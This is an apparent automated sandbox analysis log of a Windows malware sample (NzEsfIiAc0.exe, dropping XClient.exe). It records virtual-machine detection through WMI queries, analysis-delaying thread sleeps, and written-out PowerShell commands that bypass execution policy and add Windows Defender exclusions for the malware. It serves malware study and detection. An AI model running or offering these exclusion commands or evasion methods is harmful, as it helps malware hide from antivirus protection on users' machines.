                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeMemory allocated: 990000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeMemory allocated: 1A5F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeWindow / User API: threadDelayed 2733Jump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeWindow / User API: threadDelayed 7105Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6607Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3240Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5923Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3799Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7074Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2480Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1938
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe TID: 6516Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 356Thread sleep count: 5923 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1824Thread sleep count: 3799 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4864Thread sleep count: 7074 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4864Thread sleep count: 2480 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4232Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: NzEsfIiAc0.exe, 00000000.00000002.3430786927.000000001B5DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe'
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe'
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NzEsfIiAc0.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeQueries volume information: C:\Users\user\Desktop\NzEsfIiAc0.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
